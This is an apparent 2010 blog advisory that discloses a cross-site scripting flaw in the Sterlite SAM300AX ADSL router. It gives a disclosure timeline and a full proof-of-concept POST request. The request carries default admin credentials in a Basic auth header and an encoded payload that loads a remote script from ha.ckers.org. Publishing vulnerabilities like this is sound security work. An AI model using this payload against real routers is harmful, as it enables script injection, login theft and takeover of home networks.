Sunday, February 7, 2010

Sterlite SAM300AX ADSL router Cross Site Scripting (XSS)


Well, I reported XSS in Sterlite router on Feb 5, 2010.

Sterlite SAM300AX is used by broadband customers in Delhi and Mumbai, India. Given the customer base of MTNL in these 2 metro cities, this vulnerability may be extremely useful for an attacker and / or a bot herder looking for new bots.

After waiting for vendor response 2 weeks +, I decided to publish this to Full Disclosure/publicly.


Sharing the vuln POST request and parameters here:

POST Request
POST http://192.168.1.1/Forms/status_statistics_1 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7)
Gecko/20091221 Firefox/3.5.7 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/status/status_statistics.htm
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-length: 101
POST Parameters
Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH

Screenshots
 

 

Impact
Remote script / code execution, login theft n other nasty things.
##########
Vulnerability Found: January 19, 2010 
Vendor First Notified: January 20, 2010 
Vendor Response: None 
Follow Up Notification: January 27, 2010 
Vendor Response: None 
Public Disclosure: February 05, 2010 
##########

You can read the full details here:
http://secunia.com/advisories/38463/

No comments:

Post a Comment

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.